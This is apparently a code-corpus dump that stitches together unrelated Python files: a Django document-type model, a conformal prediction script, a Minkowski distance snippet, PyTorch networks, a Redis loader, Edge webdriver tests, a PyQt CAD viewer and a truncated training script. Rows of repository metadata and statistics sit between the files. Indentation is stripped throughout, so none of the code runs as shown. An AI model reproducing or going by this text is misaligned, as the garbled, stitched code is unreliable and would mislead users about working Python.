from mayan.apps.acls.models import AccessControlList
from mayan.apps.common.literals import TIME_DELTA_UNIT_CHOICES
from mayan.apps.common.serialization import yaml_load
from mayan.apps.common.validators import YAMLValidator
from ..classes import BaseDocumentFilenameGenerator
from ..events import event_document_type_created, event_document_type_edited
from ..literals import DEFAULT_DELETE_PERIOD, DEFAULT_DELETE_TIME_UNIT
from ..managers import DocumentTypeManager
from ..permissions import permission_document_view
from ..settings import setting_language
__all__ = ('DocumentType', 'DocumentTypeFilename')
logger = logging.getLogger(name=__name__)
class DocumentType(models.Model):
"""
Define document types or classes to which a specific set of
properties can be attached
"""
label = models.CharField(
help_text=_('The name of the document type.'), max_length=96,
unique=True, verbose_name=_('Label')
)
trash_time_period = models.PositiveIntegerField(
blank=True, help_text=_(
'Amount of time after which documents of this type will be '
'moved to the trash.'
), null=True, verbose_name=_('Trash time period')
)
trash_time_unit = models.CharField(
blank=True, choices=TIME_DELTA_UNIT_CHOICES, null=True, max_length=8,
verbose_name=_('Trash time unit')
)
delete_time_period = models.PositiveIntegerField(
blank=True, default=DEFAULT_DELETE_PERIOD, help_text=_(
'Amount of time after which documents of this type in the trash '
'will be deleted.'
), null=True, verbose_name=_('Delete time period')
)
delete_time_unit = models.CharField(
blank=True, choices=TIME_DELTA_UNIT_CHOICES,
default=DEFAULT_DELETE_TIME_UNIT, max_length=8, null=True,
verbose_name=_('Delete time unit')
)
filename_generator_backend = models.CharField(
default=BaseDocumentFilenameGenerator.get_default(), help_text=_(
'The class responsible for producing the actual filename used '
'to store the uploaded documents.'
), max_length=224, verbose_name=_('Filename generator backend')
)
filename_generator_backend_arguments = models.TextField(
blank=True, help_text=_(
'The arguments for the filename generator backend as a '
'YAML dictionary.'
), validators=[YAMLValidator()], verbose_name=_(
'Filename generator backend arguments'
)
)
objects = DocumentTypeManager()
class Meta:
ordering = ('label',)
verbose_name = _('Document type')
verbose_name_plural = _('Documents types')
def __str__(self):
return self.label
def delete(self, *args, **kwargs):
Document = apps.get_model(
app_label='documents', model_name='Document'
)
for document in Document.objects.filter(document_type=self):
document.delete(to_trash=False)
return super(DocumentType, self).delete(*args, **kwargs)
@property
def deleted_documents(self):
DeletedDocument = apps.get_model(
app_label='documents', model_name='DeletedDocument'
)
return DeletedDocument.objects.filter(document_type=self)
def get_absolute_url(self):
return reverse(
viewname='documents:document_type_document_list', kwargs={
'document_type_id': self.pk
}
)
def get_document_count(self, user):
queryset = AccessControlList.objects.restrict_queryset(
permission=permission_document_view, queryset=self.documents,
user=user
)
return queryset.count()
def get_upload_filename(self, instance, filename):
generator_klass = BaseDocumentFilenameGenerator.get(
name=self.filename_generator_backend
)
generator_instance = generator_klass(
**yaml_load(
stream=self.filename_generator_backend_arguments or '{}'
)
)
return generator_instance.upload_to(
instance=instance, filename=filename
)
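    # Example (hypothetical argument name): with filename_generator_backend_arguments
    # set to the YAML dictionary '{maximum_length: 16}', the backend class above would
    # be instantiated as generator_klass(maximum_length=16)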
def natural_key(self):
return (self.label,)
def new_document(
self, file_object, label=None, description=None, language=None,
_user=None
):
Document = apps.get_model(
app_label='documents', model_name='Document'
)
try:
document = Document(
description=description or '', document_type=self,
label=label or file_object.name,
language=language or setting_language.value
)
document.save(_user=_user)
except Exception as exception:
logger.critical(
'Unexpected exception while trying to create new document '
'"%s" from document type "%s"; %s',
label or file_object.name, self, exception
)
raise
else:
try:
document_version = document.new_version(
file_object=file_object, _user=_user
)
except Exception as exception:
logger.critical(
'Unexpected exception while trying to create initial '
'version for document %s; %s',
label or file_object.name, exception
)
raise
else:
return document, document_version
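    # Usage sketch (hypothetical file name): given a DocumentType instance `document_type`,
    #   with open('report.pdf', mode='rb') as file_object:
    #       document, version = document_type.new_document(file_object=file_object)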
def save(self, *args, **kwargs):
user = kwargs.pop('_user', None)
created = not self.pk
result = super(DocumentType, self).save(*args, **kwargs)
if created:
event_document_type_created.commit(
actor=user, target=self
)
else:
event_document_type_edited.commit(
actor=user, target=self
)
return result
class DocumentTypeFilename(models.Model):
"""
List of labels available to a specific document type for the
quick rename functionality
"""
document_type = models.ForeignKey(
on_delete=models.CASCADE, related_name='filenames', to=DocumentType,
verbose_name=_('Document type')
)
filename = models.CharField(
db_index=True, max_length=128, verbose_name=_('Label')
)
enabled = models.BooleanField(default=True, verbose_name=_('Enabled'))
class Meta:
ordering = ('filename',)
unique_together = ('document_type', 'filename')
verbose_name = _('Quick label')
verbose_name_plural = _('Quick labels')
def __str__(self):
return self.filename
| 33.673171 | 77 | 0.636969 | 729 | 6,903 | 5.791495 | 0.248285 | 0.045476 | 0.039792 | 0.013501 | 0.236144 | 0.17243 | 0.137376 | 0.12648 | 0.11748 | 0.11748 | 0 | 0.002012 | 0.280168 | 6,903 | 204 | 78 | 33.838235 | 0.847655 | 0.025206 | 0 | 0.149701 | 0 | 0 | 0.137369 | 0.005531 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05988 | false | 0 | 0.08982 | 0.023952 | 0.299401 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2bc9da991f1852bdbaaee4bfb91787bb957cf51 | 2,783 | py | Python | conf_pred_postproc.py | FredrikSvenssonUK/tox21_conformal | a77a87a1bdefd058b3285d7ee1c65bcbdf8eb1d4 | [
"MIT"
] | 2 | 2021-07-19T04:30:20.000Z | 2021-12-24T00:18:37.000Z | conf_pred_postproc.py | FredrikSvenssonUK/tox21_conformal | a77a87a1bdefd058b3285d7ee1c65bcbdf8eb1d4 | [
"MIT"
] | null | null | null | conf_pred_postproc.py | FredrikSvenssonUK/tox21_conformal | a77a87a1bdefd058b3285d7ee1c65bcbdf8eb1d4 | [
"MIT"
] | 1 | 2021-07-19T04:30:21.000Z | 2021-07-19T04:30:21.000Z | #!/usr/bin/env python
# imports
import sys
from bisect import bisect_right
import numpy as np
from numpy import asanyarray
import pandas as pd
def search(alist, item):
    'Return the number of values in alist that are <= item (rightmost insertion point)'
i = bisect_right(alist, item)
return i
############## main program ###################
try:
sys.argv[1]
except IndexError:
print ("You need to specify and input file with combined calibration and test set scores")
sys.exit(1)
try:
sys.argv[2]
except IndexError:
print ("You need to specify maximum number of models to use (<0 = all models)")
sys.exit(1)
aa = sys.argv[1] + '_p-values_pred.csv'
f = open(aa,'w')
f.write('Title\tPred\tp-value low class\tp-value high class\tpred_class_0.2\tclass\tloop\n')
df = pd.read_csv(sys.argv[1], sep='\t', header = 0, index_col = None)
dfhigh = df.loc[df['class'] > 0]
dflow = df.loc[df['class'] <= 0]
maxmodel = df['model'].max()
if int(sys.argv[2]) > 0:
maxmodel = int(sys.argv[2])
print (maxmodel)
for model in range(0, maxmodel+1):
print ('model', model)
calibrhigh = df.loc[df['class'] > 0]
calibrhigh = calibrhigh.loc[calibrhigh['model'] == model]
    #print(calibrhigh)
calibrhigh = calibrhigh.loc[calibrhigh['set'] == 'cal']
calibrhigh = calibrhigh['score_high']
calibrsort1 = np.sort(calibrhigh, axis=None)
calibrsort1 = calibrsort1.astype(float)
calibrlow = df.loc[df['class'] <= 0]
calibrlow = calibrlow.loc[calibrlow['model'] == model]
#print(calibrlow)
calibrlow = calibrlow.loc[calibrlow['set'] == 'cal']
calibrlow = calibrlow['score_low']
calibrsort0 = np.sort(calibrlow, axis=None)
calibrsort0 = calibrsort0.astype(float)
lencl0 = len(calibrsort0)
lencl1 = len(calibrsort1)
#print (lencl0, lencl1)
test = df.loc[df['model'] == model]
test = test.loc[test['set'] == 'test']
testid = test['id']
testclass = test['class']
testhigh = asanyarray(test['score_high'])
testlow = asanyarray(test['score_low'])
ll = len(testclass)
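    # Mondrian (class-conditional) conformal p-values: for each test score s,
    # p = |{calibration scores <= s}| / (n_calibration + 1), computed per class
    # via bisect_right on the sorted calibration scores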
for yy in range(0, ll):
pos0 = search(calibrsort0, testlow[yy])
pos1 = search(calibrsort1, testhigh[yy])
lencl00 = lencl0 + 1
pos0 = float(pos0)/float(lencl00)
lencl11 = lencl1 + 1
pos1 = float(pos1)/float(lencl11)
testid = asanyarray(test['id'])
testclass = asanyarray(testclass)
write0 = str(testid[yy]) + '\tNA\t' + str(pos0) + '\t' + str(pos1) + '\tNA\t' + str(testclass[yy]) + '\t' + str(model) + '\n'
f.write(write0)
f.close()
print ('Finished')
| 27.83 | 135 | 0.605821 | 360 | 2,783 | 4.647222 | 0.358333 | 0.025105 | 0.020921 | 0.028691 | 0.075314 | 0.044232 | 0.044232 | 0 | 0 | 0 | 0 | 0.02649 | 0.240388 | 2,783 | 99 | 136 | 28.111111 | 0.764901 | 0.045994 | 0 | 0.088235 | 0 | 0.014706 | 0.169591 | 0.014035 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014706 | false | 0 | 0.102941 | 0 | 0.132353 | 0.088235 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2bfb757a8bcdcb0b66778c0046b5270e30b43fb | 418 | py | Python | Distances/minkowski.py | TheWorstOne/numpy-formulas | 093657d4a23dfe82685595254aae50e0c6e46afb | [
"Unlicense"
] | 5 | 2021-04-21T00:41:04.000Z | 2022-03-09T06:57:00.000Z | Distances/minkowski.py | magabydelgado/numpy-formulas | 093657d4a23dfe82685595254aae50e0c6e46afb | [
"Unlicense"
] | null | null | null | Distances/minkowski.py | magabydelgado/numpy-formulas | 093657d4a23dfe82685595254aae50e0c6e46afb | [
"Unlicense"
] | 2 | 2021-06-22T03:04:54.000Z | 2022-03-16T18:59:33.000Z | import numpy as np
'''
Minkowski distance is a distance/ similarity measurement between two points
in the normed vector space (N dimensional real space) and is a generalization of
the Euclidean distance and the Manhattan distance.
'''
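# Formula: d(A, B) = (sum_i |a_i - b_i| ** h) ** (1 / h); h = 1 gives the Manhattan
# distance and h = 2 the Euclidean distance.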
objA = [22, 1, 42, 10]
objB = [20, 0, 36, 8]
h = 3
npA = np.array(objA)
npB = np.array(objB)
minkowski = (np.abs(npA - npB) ** h).sum() ** (1/h)
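# Optional sanity check (assumes SciPy is installed; not part of the original formula):
# scipy.spatial.distance.minkowski should agree with the manual computation above.
from scipy.spatial.distance import minkowski as scipy_minkowski
print(scipy_minkowski(npA, npB, p=h))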
print(minkowski) | 19.904762 | 85 | 0.667464 | 66 | 418 | 4.227273 | 0.666667 | 0.021505 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045593 | 0.212919 | 418 | 21 | 86 | 19.904762 | 0.802432 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2c0747825eeba5177fcc34ea86ece6fc2eb3214 | 3,550 | py | Python | networks/cp_generator.py | rfww/EfficientChangeDetection | 42d466c56ed262980c27fd6cde6ffe65314e638f | [
"BSD-Source-Code"
] | null | null | null | networks/cp_generator.py | rfww/EfficientChangeDetection | 42d466c56ed262980c27fd6cde6ffe65314e638f | [
"BSD-Source-Code"
] | null | null | null | networks/cp_generator.py | rfww/EfficientChangeDetection | 42d466c56ed262980c27fd6cde6ffe65314e638f | [
"BSD-Source-Code"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
class SegNetEnc(nn.Module):
def __init__(self, in_channels, out_channels, scale_factor,num_layers):
super().__init__()
layers = [
nn.Upsample(scale_factor=scale_factor, mode='bilinear'),
nn.Conv2d(in_channels, in_channels // 2, 3, padding=1),
nn.BatchNorm2d(in_channels // 2),
nn.ReLU(inplace=True),
]
layers += [
nn.Conv2d(in_channels // 2, in_channels // 2, 3, padding=1),
nn.BatchNorm2d(in_channels // 2),
nn.ReLU(inplace=True),
] * num_layers
layers += [
nn.Conv2d(in_channels // 2, out_channels, 3, padding=1),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
]
self.encode = nn.Sequential(*layers)
def forward(self, x):
return self.encode(x)
class Generator(nn.Module):
def __init__(self, in_channels):
super().__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(in_channels, in_channels * 2, 1, padding=0),
nn.BatchNorm2d(in_channels * 2),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels * 2, in_channels * 2, 3, padding=1),
nn.MaxPool2d(2,2),
nn.BatchNorm2d(in_channels * 2),
nn.ReLU(inplace=True),
)
self.layer2 = nn.Sequential(
nn.Conv2d(in_channels * 2, in_channels * 4, 1, padding=0),
nn.BatchNorm2d(in_channels * 4),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels * 4, in_channels * 4, 3, padding=1),
nn.MaxPool2d(2,2),
nn.BatchNorm2d(in_channels * 4),
nn.ReLU(inplace=True),
)
self.layer3 = nn.Sequential(
nn.Conv2d(in_channels * 4, in_channels * 8, 1, padding=0),
nn.BatchNorm2d(in_channels * 8),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels * 8, in_channels * 8, 3, padding=1),
nn.MaxPool2d(2,2),
nn.BatchNorm2d(in_channels * 8),
nn.ReLU(inplace=True),
)
def forward(self, x):
out1 = self.layer1(x)
out2 = self.layer2(out1)
out3 = self.layer3(out2)
return out1, out2, out3
class CCP_Generator(nn.Module):
def __init__(self,in_dim,out_dim):
super().__init__()
self.sgp= SegNetEnc(in_dim*(2+4+8),out_dim,1,1)
        self.ccp_G = Generator(in_dim)
self.pr1 = nn.Sequential(
nn.Conv2d(in_dim*2,in_dim*2,3,1,1),
nn.BatchNorm2d(in_dim*2),
nn.ReLU(inplace=True)
)
self.pr2 = nn.Sequential(
nn.Conv2d(in_dim*4,in_dim*4,3,1,1),
nn.BatchNorm2d(in_dim*4),
nn.ReLU(inplace=True)
)
self.pr3 = nn.Sequential(
nn.Conv2d(in_dim*8,in_dim*8,3,1,1),
nn.BatchNorm2d(in_dim*8),
nn.ReLU(inplace=True)
)
def forward(self, x, y):
x1, x2, x3 = self.ccp_G(x)
y1, y2, y3 = self.ccp_G(y)
pr1 = self.pr1(abs(x1-y1))
pr2 = self.pr2(abs(x2-y2))
pr3 = self.pr3(abs(x3-y3))
ccp = self.sgp(torch.cat([
F.upsample_bilinear(pr1, scale_factor=0.5),
pr2,
F.upsample_bilinear(pr3, scale_factor=2)
],1))
return ccp
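    # Shape sketch (assumption, following the MaxPool2d(2, 2) stages above, for H and W
    # divisible by 8): an input pair of shape (N, in_dim, H, W) yields |x - y| difference
    # maps at in_dim*2 x H/2, in_dim*4 x H/4 and in_dim*8 x H/8; all three are resampled
    # to the H/4 grid and fused by SegNetEnc, giving an output of shape (N, out_dim, H/4, W/4):
    #   g = CCP_Generator(in_dim=3, out_dim=64)
    #   ccp = g(torch.randn(1, 3, 64, 64), torch.randn(1, 3, 64, 64))  # -> (1, 64, 16, 16)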
| 31.981982 | 75 | 0.541408 | 468 | 3,550 | 3.931624 | 0.153846 | 0.146739 | 0.065217 | 0.11087 | 0.591848 | 0.568478 | 0.45163 | 0.308152 | 0.288587 | 0.166304 | 0 | 0.058305 | 0.328451 | 3,550 | 110 | 76 | 32.272727 | 0.713507 | 0 | 0 | 0.315789 | 0 | 0 | 0.002254 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.063158 | false | 0 | 0.063158 | 0.010526 | 0.189474 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2c217a6d6cc0f9b87b8034e2a9420e72704039c | 2,156 | py | Python | solutions/recommender_system/quick_deploy/movie_recommender/to_redis.py | kilianovski/bootcamp | 8f3a753592ecb931815fde068f6377485e3fbe79 | [
"Apache-2.0"
] | 789 | 2019-08-26T11:20:33.000Z | 2022-03-31T05:12:20.000Z | solutions/recommender_system/quick_deploy/movie_recommender/to_redis.py | kilianovski/bootcamp | 8f3a753592ecb931815fde068f6377485e3fbe79 | [
"Apache-2.0"
] | 569 | 2019-08-22T12:45:59.000Z | 2022-03-27T09:08:39.000Z | solutions/recommender_system/quick_deploy/movie_recommender/to_redis.py | kilianovski/bootcamp | 8f3a753592ecb931815fde068f6377485e3fbe79 | [
"Apache-2.0"
] | 450 | 2019-08-09T10:12:14.000Z | 2022-03-27T12:30:36.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# !/bin/env python
import redis
import json
import codecs
#1::Toy Story (1995)::Animation|Children's|Comedy
def process_movie(lines, redis_cli):
for line in lines:
if len(line.strip()) == 0:
continue
tmp = line.strip().split("::")
movie_id = tmp[0]
title = tmp[1]
genre_group = tmp[2]
tmp = genre_group.strip().split("|")
genre = tmp
movie_info = {"movie_id" : movie_id,
"title" : title,
"genre" : genre
}
redis_cli.set("{}##movie_info".format(movie_id), json.dumps(movie_info))
#1::F::1::10::48067
def process_user(lines, redis_cli):
for line in lines:
if len(line.strip()) == 0:
continue
tmp = line.strip().split("::")
user_id = tmp[0]
gender = tmp[1]
age = tmp[2]
job = tmp[3]
zip_code = tmp[4]
user_info = {"user_id": user_id,
"gender": gender,
"age": age,
"job": job,
"zip_code": zip_code
}
redis_cli.set("{}##user_info".format(user_id), json.dumps(user_info))
if __name__ == "__main__":
r = redis.StrictRedis(host="127.0.0.1", port="6379")
with codecs.open("users.dat", "r",encoding='utf-8',errors='ignore') as f:
lines0 = f.readlines()
process_user(lines0, r)
with codecs.open("movies.dat", "r",encoding='utf-8',errors='ignore') as f:
lines0 = f.readlines()
process_movie(lines0, r)
| 32.666667 | 80 | 0.594156 | 294 | 2,156 | 4.238095 | 0.44898 | 0.048154 | 0.020867 | 0.025682 | 0.194222 | 0.194222 | 0.194222 | 0.194222 | 0.194222 | 0.194222 | 0 | 0.030632 | 0.273191 | 2,156 | 65 | 81 | 33.169231 | 0.764518 | 0.308905 | 0 | 0.232558 | 0 | 0 | 0.095853 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046512 | false | 0 | 0.069767 | 0 | 0.116279 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2c25a1adbdfbb794164973860e4a11af311fb29 | 1,679 | py | Python | tests/test_edge_driver.py | miguelius/webdriver_manager | d19805bb5a0d23b5f2b1bf997de1e7f8d494a0be | [
"Apache-2.0"
] | null | null | null | tests/test_edge_driver.py | miguelius/webdriver_manager | d19805bb5a0d23b5f2b1bf997de1e7f8d494a0be | [
"Apache-2.0"
] | null | null | null | tests/test_edge_driver.py | miguelius/webdriver_manager | d19805bb5a0d23b5f2b1bf997de1e7f8d494a0be | [
"Apache-2.0"
] | null | null | null | import os
import pytest
from selenium import webdriver
from webdriver_manager.microsoft import EdgeChromiumDriverManager
def test_edge_manager_with_selenium():
driver_path = EdgeChromiumDriverManager().install()
driver = webdriver.Edge(executable_path=driver_path, capabilities={})
driver.get("http://automation-remarks.com")
driver.quit()
def test_edge_manager_with_wrong_version():
with pytest.raises(ValueError) as ex:
driver_path = EdgeChromiumDriverManager(
version="0.2",
os_type='win64',
).install()
driver = webdriver.Edge(executable_path=driver_path)
driver.quit()
assert (
"There is no such driver by url "
"https://msedgedriver.azureedge.net/0.2/edgedriver_win64.zip"
) in ex.value.args[0]
@pytest.mark.parametrize('os_type', ['win32', 'win64', 'linux64', 'mac64'])
def test_can_download_edge_driver(os_type):
path = EdgeChromiumDriverManager(os_type=os_type).install()
assert os.path.exists(path)
@pytest.mark.parametrize('os_type', ['win32', 'win64', 'mac64', 'linux64'])
def test_can_get_edge_driver_from_cache(os_type):
EdgeChromiumDriverManager(os_type=os_type).install()
driver_path = EdgeChromiumDriverManager(os_type=os_type).install()
assert os.path.exists(driver_path)
@pytest.mark.parametrize('os_type', ['win32', 'win64', 'mac64', 'linux64'])
@pytest.mark.parametrize('specific_version', ['86.0.600.0'])
def test_edge_with_specific_version(os_type, specific_version):
bin_path = EdgeChromiumDriverManager(
version=specific_version,
os_type=os_type,
).install()
assert os.path.exists(bin_path)
| 31.092593 | 75 | 0.720071 | 207 | 1,679 | 5.584541 | 0.304348 | 0.077855 | 0.072664 | 0.041522 | 0.432526 | 0.394464 | 0.356401 | 0.324394 | 0.237889 | 0.205882 | 0 | 0.028169 | 0.154258 | 1,679 | 53 | 76 | 31.679245 | 0.785915 | 0 | 0 | 0.157895 | 0 | 0 | 0.142942 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.131579 | false | 0 | 0.105263 | 0 | 0.236842 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2c2b4d3e04511ca0faea6250d8ead039b4f7eea | 3,691 | py | Python | CAMOnion/cadgraphicsview.py | JonRob812/CAMOnion | fcc0fce9ca0f7e170e2a06d1083995e9ef3d475a | [
"MIT"
] | null | null | null | CAMOnion/cadgraphicsview.py | JonRob812/CAMOnion | fcc0fce9ca0f7e170e2a06d1083995e9ef3d475a | [
"MIT"
] | null | null | null | CAMOnion/cadgraphicsview.py | JonRob812/CAMOnion | fcc0fce9ca0f7e170e2a06d1083995e9ef3d475a | [
"MIT"
] | null | null | null | import argparse
import signal
import sys
from functools import partial
from typing import Optional
from PyQt5 import QtWidgets as qw, QtCore as qc, QtGui as qg
import ezdxf
from ezdxf.addons.drawing import Frontend, RenderContext
from ezdxf.addons.drawing.pyqt import _get_x_scale, PyQtBackend, CorrespondingDXFEntity, \
CorrespondingDXFEntityStack
from ezdxf.drawing import Drawing
class CADGraphicsView(qw.QGraphicsView):
def __init__(self, view_buffer: float = 0.2):
super().__init__()
self._zoom = 1
self._default_zoom = 1
self._zoom_limits = (0.5, 100)
self._view_buffer = view_buffer
self.setTransformationAnchor(qw.QGraphicsView.AnchorUnderMouse)
self.setResizeAnchor(qw.QGraphicsView.AnchorUnderMouse)
self.setVerticalScrollBarPolicy(qc.Qt.ScrollBarAlwaysOff)
self.setHorizontalScrollBarPolicy(qc.Qt.ScrollBarAlwaysOff)
self.setDragMode(qw.QGraphicsView.ScrollHandDrag)
self.setFrameShape(qw.QFrame.NoFrame)
self.setRenderHints(qg.QPainter.Antialiasing | qg.QPainter.TextAntialiasing | qg.QPainter.SmoothPixmapTransform)
def clear(self):
pass
def fit_to_scene(self):
r = self.sceneRect()
bx, by = r.width() * self._view_buffer / 2, r.height() * self._view_buffer / 2
self.fitInView(self.sceneRect().adjusted(-bx, -by, bx, by), qc.Qt.KeepAspectRatio)
self._default_zoom = _get_x_scale(self.transform())
self._zoom = 1
def _get_zoom_amount(self) -> float:
return _get_x_scale(self.transform()) / self._default_zoom
def wheelEvent(self, event: qg.QWheelEvent) -> None:
# dividing by 120 gets number of notches on a typical scroll wheel. See QWheelEvent documentation
delta_notches = event.angleDelta().y() / 120
zoom_per_scroll_notch = 0.2
factor = 1 + zoom_per_scroll_notch * delta_notches
resulting_zoom = self._zoom * factor
if resulting_zoom < self._zoom_limits[0]:
factor = self._zoom_limits[0] / self._zoom
elif resulting_zoom > self._zoom_limits[1]:
factor = self._zoom_limits[1] / self._zoom
self.scale(factor, factor)
self._zoom *= factor
class CADGraphicsViewWithOverlay(CADGraphicsView):
element_selected = qc.pyqtSignal(object, qc.QPointF)
graphics_view_clicked = qc.pyqtSignal(object)
def __init__(self, parent=None):
super().__init__()
self._current_item: Optional[qw.QGraphicsItem] = None
self.setParent(parent)
def clear(self):
super().clear()
self._current_item = None
def drawForeground(self, painter: qg.QPainter, rect: qc.QRectF) -> None:
if self._current_item is not None:
# if self._current_item.
if self._current_item.isEnabled():
r = self._current_item.boundingRect()
r.setHeight(r.height()-.1)
r = self._current_item.sceneTransform().mapRect(r)
painter.fillRect(r, qg.QColor(0, 255, 0, 100))
def mouseMoveEvent(self, event: qg.QMouseEvent) -> None:
pos = self.mapToScene(event.pos())
self._current_item = self.scene().itemAt(pos, qg.QTransform())
self.element_selected.emit(self._current_item, pos)
# print(self.element_selected, pos)
self.scene().invalidate(self.sceneRect(), qw.QGraphicsScene.ForegroundLayer)
super().mouseMoveEvent(event)
def mousePressEvent(self, event: qg.QMouseEvent) -> None:
if self._current_item:
self.graphics_view_clicked.emit(self._current_item)
print(event.pos())
super().mousePressEvent(event)
| 39.265957 | 120 | 0.680574 | 435 | 3,691 | 5.544828 | 0.335632 | 0.036484 | 0.068408 | 0.028192 | 0.089967 | 0.021559 | 0 | 0 | 0 | 0 | 0 | 0.012128 | 0.218098 | 3,691 | 93 | 121 | 39.688172 | 0.823631 | 0.041181 | 0 | 0.081081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.135135 | false | 0.013514 | 0.135135 | 0.013514 | 0.337838 | 0.013514 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2c4307644ca13cda4b784e9d220eb73eec8492b | 13,191 | py | Python | train.py | sogithuby/ragc | 08d64d7604e19b60a976d0a698fbfba555738bdc | [
"MIT"
] | 6 | 2019-09-25T05:19:52.000Z | 2021-11-03T02:01:45.000Z | train.py | sogithuby/ragc | 08d64d7604e19b60a976d0a698fbfba555738bdc | [
"MIT"
] | null | null | null | train.py | sogithuby/ragc | 08d64d7604e19b60a976d0a698fbfba555738bdc | [
"MIT"
] | 3 | 2020-04-07T11:27:29.000Z | 2021-07-16T20:43:38.000Z | """
Residual Attention Graph Convolutional network for Geometric 3D Scene Classification
2019 Albert Mosella-Montoro <albert.mosella@upc.edu>
"""
import torch
import torch_geometric
import torch.nn as nn
import random
import numpy as np
import os
import sys
import math
import argparse
from tqdm import tqdm
import functools
import ast
import utils
import metrics
import graph_model as models
from tensorboardX import SummaryWriter
from h53dclass_dataloader import H53DClassDataset
import gc
def train(model, loader, loss_criterion, optimizer, label_names, batch_parts=1, cuda=True):
model.train()
numIt = len(loader)
loader = tqdm(loader, ncols=100)
losses = metrics.AverageMeter()
cm = metrics.ConfusionMatrixMeter(label_names, cmap='Oranges')
prev = -1
optimizer.zero_grad()
for i, batch in enumerate(loader, start = 0):
if cuda: batch = batch.to('cuda:0')
outputs = model(batch)
out_device = outputs.device
gt = batch.y.to(out_device)
loss = loss_criterion(outputs, gt)
loss.backward()
batch_size = len(torch.unique(batch.batch))
losses.update(loss.item(), batch_size)
cm.add(gt.cpu().data.numpy(), outputs.cpu().data.numpy())
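        # Gradient accumulation: gradients from `batch_parts` consecutive loader batches
        # are summed (and averaged below) before each optimizer step, so the effective
        # batch size is batch_parts * loader batch size (= args.batch_size)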
if (i+1) % batch_parts == 0 or (i+1) == numIt:
if batch_parts>1:
accum = i-prev
prev = i
for p in model.parameters():
p.grad.div_(accum)
optimizer.step()
optimizer.zero_grad()
torch.cuda.empty_cache()
return losses.avg, cm
def val(model, loader, loss_criterion, label_names, cuda = True):
model.eval()
loader = tqdm(loader, ncols=100)
losses = metrics.AverageMeter()
cm = metrics.ConfusionMatrixMeter(label_names, cmap='Blues')
with torch.no_grad():
for i, batch in enumerate(loader, start = 0):
if cuda: batch = batch.to('cuda:0')
batch_size = len(batch.batch.unique())
outputs = model(batch)
out_device = outputs.device
gt = batch.y.to(out_device)
loss = loss_criterion(outputs, gt)
batch_size = len(torch.unique(batch.batch))
losses.update(loss.item(), batch_size)
cm.add(gt.cpu().data.numpy(), outputs.cpu().data.numpy())
loader.set_postfix({"loss" : loss.item()})
torch.cuda.empty_cache()
return losses.avg, cm
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='AGC')
# Optimization arguments
parser.add_argument('--optim', default='adam', type=str, choices=['sgd','adam'], help='optimizer')
parser.add_argument('--wd', default=5e-4, type=float, help='Weight decay')
parser.add_argument('--lr', default=1e-3, type=float, help='Learning rate')
parser.add_argument('--momentum', default=0.9, type=float, help='Momentum')
parser.add_argument('--betas', default='(0.9,0.999)', help = "Betas of adam optimizer")
